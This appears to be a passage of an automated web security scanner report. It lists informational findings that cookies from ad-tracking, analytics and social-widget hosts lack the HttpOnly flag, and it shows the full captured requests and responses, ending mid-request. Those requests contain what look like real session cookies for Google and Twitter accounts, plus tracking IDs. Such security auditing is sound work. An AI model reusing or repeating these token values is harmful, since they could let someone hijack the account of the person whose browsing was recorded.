Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
13.81. http://amch.questionmarket.com/adscgen/dynamiclink.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:56 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: LP=1316277476; expires=Wed, 21 Sep 2011 20:37:56 GMT; path=/; domain=.questionmarket.com
Content-Length: 2417
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
13.82. http://api.aggregateknowledge.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.aggregateknowledge.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&nocache=0.8631503 HTTP/1.1
Host: api.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.aggregateknowledge.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 17:14:36 GMT; Path=/
Location: http://api.agkn.com/optout2?s=nai&dc=1
Content-Language: en-US
Content-Length: 0
Date: Sat, 17 Sep 2011 17:14:36 GMT
Connection: close

13.83. http://api.agkn.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.agkn.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&dc=1 HTTP/1.1
Host: api.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uuid=790101267012119588; u=6|0BEgV%2BAZ5AAAwAAcBACcBA1irAAUAuwEAnwDOAQCfAJwBAJ8AnQEAnwCeAQCfAQJQfQHlAAAAAAPsKsEAAAAAApZbUAAAAAAOfLfdAWsAHQ%3D%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 17:15:26 GMT; Path=/
Location: http://api.aggregateknowledge.com/optout2?s=nai&q=validate
Content-Language: en-US
Content-Length: 0
Date: Sat, 17 Sep 2011 17:15:26 GMT
Connection: close

13.84. http://api.choicestream.com/instr/crunch/almondnet/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.choicestream.com
Path:   /instr/crunch/almondnet/seg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/crunch/almondnet/seg?segs=300201,0&rnd=152139181 HTTP/1.1
Host: api.choicestream.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352)
Cookie: CSAnywhere=e74b545d-4693-4a7c-bc85-28be31beaff6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 47245d0f-81c9-4c0a-95dc-82cd24b06e97
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0
Pragma: no-cache
Last-Modified: Sat, 17 Sep 2011 16:56:58 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 16:56:58 GMT
Connection: close
Set-Cookie: __cs_pcs=""; Domain=.choicestream.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/instr/crunch
Set-Cookie: CSAnywhere=e74b545d-4693-4a7c-bc85-28be31beaff6; Domain=.choicestream.com; Expires=Sun, 16-Sep-2012 16:56:58 GMT; Path=/

GIF89a.............!...
...,...........L..;
13.85. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=donatemydress&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&since_id=108937040900521984&refresh=true&clientsource=TWITTERINC_WIDGET&1316294807080=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622; original_referer=ZLhHHTiegr%2BCdn6sXdQJWUmDjkiRQJlv0w2g35v18j4%3D; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJWRmNzNjOTVlMzdkNzA1MzA5NWQxNGM0%250AZTVlODIxYThmOg9jcmVhdGVkX2F0bCsIYpI0eDIB--5023b45acba9e3b63ba715734f7413258dff672e

Response

HTTP/1.1 400 Bad Request
Date: Sat, 17 Sep 2011 16:41:03 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00799
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1316280303
Set-Cookie: guest_id=v1%3A131627766338056659; domain=.twitter.com; path=/; expires=Tue, 17 Sep 2013 04:41:03 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPqIQXgyAToHaWQiJTY5NTkxNjc4ZjZkNDA1%250AZDM0ZjVhYTRlZjE2ZGVjYWUyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--61914355fa092810f2dad4d5f9ceefa29e06a23a; domain=.twitter.com; path=/; HttpOnly
Expires: Sat, 17 Sep 2011 16:46:03 GMT
Vary: Accept-Encoding
Content-Length: 349
Connection: close

TWTR.Widget.receiveCallback_1({"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/statuses\/user_timeline.json?screen_name=donatemydress&callback=TWTR
...[SNIP]...
13.86. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRjb4mFhO8s9VCzxxwsHFWl5Z11Hlug2MgdCExcQRMRoy4PSRUoNV-Y2dnoZafHdvtGru0a_Lk3-ysyQWUQihRlon0D1Ac0BHwlFhmCm9rm4Aq9Dur_13HoNqB4O34EHyTyDX5GtXlfQh8vapHPdD8hi2QjK1inyk2fyPcW-fa45C2vXbhQQWXl3EEQHm_QxXhNWPGTbe4q--uRumziR7gyLGt-2sPW4WtJpiJBbPp3-MlnP_RQ_tDo0mQAhrrx48dXpimEcHX2haTJ9-UCk0B1Hp58NFcPmYgQJ7XglFMWkVA

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAD7Xl0oDS_3Xy0JKwYeKgRjo29C9Etlmdrf1rKRRhnPW2DH-o5OttJhxFzFxEFn6ju4VPTRDgLlPtwafUNQFRahHj6mCab0WIpyAqqm2hl9rQvAIANpUEGFZoRtDOSua8174wnbnttZYbRG20rW3N8C-dyaWqikyxcktxD7QGCjAOOzbClgJMEES8i3q3nhChEwp4p5Mx1yKROZ3eKbvo1BYeGjW6bfNqWex_ZAOhwTyhNgILH07Zu0VfnWZ4O0MMOmHGNnjTEYjxC_KQC8XsOhIb_sEm1Vln8ARJJiFZ6HAI0dqAwFsvLwnkDIQoa-T6o;Domain=.google.com;Path=/;Expires=Tue, 14-Sep-2021 17:35:34 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sat, 17 Sep 2011 17:35:34 GMT
Date: Sat, 17 Sep 2011 17:35:34 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...
13.87. http://ar.atwola.com/atd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.atwola.com
Path:   /atd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atd HTTP/1.1
Host: ar.atwola.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/slf.htm?siteid=15545&dt
Cookie: cords=MToxMzE1NDkwMjg2OjUsMTMxNTQ5MDI4Njo3LDA=

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:35:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8q DAV/2
Expires: Sat, 17 Sep 2011 16:35:41 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURo DEVo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV INT STA DEM OUR"
Set-Cookie: cords=MToxMzE2Mjc3MzQxOjUsMTMxNjI3NzM0MTo3LDA=; domain=.ar.atwola.com; path=/; expires=Sun, 15 Jan 2012 16:35:41 GMT
Location: http://adadvisor.net/adscores/g.pixel?sid=9201047028&rand=962612
Content-Length: 0
Content-Type: text/plain

13.88. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/optout?nai=true&id=1936234986&nocache=0.4719862 HTTP/1.1
Host: ats.tumri.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sat Sep 17 17:20:29 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Thu, 05-Oct-2079 20:34:36 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.4719862&tu=1
Content-Length: 0
Date: Sat, 17 Sep 2011 17:20:28 GMT

13.89. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1316294698613&ns_c=ISO-8859-1&c8=&c7=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686642%3Ft%3D1316294694453%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fhearst.com%252Fnewspapers%252Fseattlepicom.php&c9=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 17 Sep 2011 16:23:46 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 16:23:46 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

13.90. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=1&c2=7395021&c3=&c4=&c5=01&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:23:17 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 16:23:17 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
13.91. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6036097&d.c=gif&d.o=hearstconnecticutglobal&d.x=227414770&d.t=page&d.u=http%3A%2F%2Fwww.stamfordadvocate.com%2F&d.r=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fthe-advocate.php HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:23:09 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 16:23:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
13.92. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=537085&ev=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app600
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 11-Sep-2012 16:31:14 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Sun, 16-Sep-2012 16:31:14 GMT; Path=/
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
13.93. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x1743
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; cw=cw; FC1-WC=53620_1_3ELLi; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app600
Set-Cookie: V=ZZVrXBMk1mFi; Domain=.contextweb.com; Expires=Tue, 11-Sep-2012 17:04:35 GMT; Path=/
Set-Cookie: cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Sun, 16-Sep-2012 17:04:35 GMT; Path=/
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:04:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
13.94. http://bing4.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing4.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Location: http://www.bing.com/
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1316279048; domain=bing4.com; path=/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 17 Sep 2011 17:04:07 GMT

13.95. http://c.gigcount.com/wildfire/IMP/CXNID=2000002.11NXC/bT*xJmx*PTEzMTYwOTczNDc5ODkmcHQ9MTMxNjA5NzM1MTA5MSZwPSZkPSZnPTImbz1iZmQ1MzRjYzQzNTQ*NzlmOTk4OWZkNWQ5/MTFkMTUyYiZvZj*w.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.gigcount.com
Path:   /wildfire/IMP/CXNID=2000002.11NXC/bT*xJmx*PTEzMTYwOTczNDc5ODkmcHQ9MTMxNjA5NzM1MTA5MSZwPSZkPSZnPTImbz1iZmQ1MzRjYzQzNTQ*NzlmOTk4OWZkNWQ5/MTFkMTUyYiZvZj*w.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.11NXC/bT*xJmx*PTEzMTYwOTczNDc5ODkmcHQ9MTMxNjA5NzM1MTA5MSZwPSZkPSZnPTImbz1iZmQ1MzRjYzQzNTQ*NzlmOTk4OWZkNWQ5/MTFkMTUyYiZvZj*w.gif HTTP/1.1
Host: c.gigcount.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
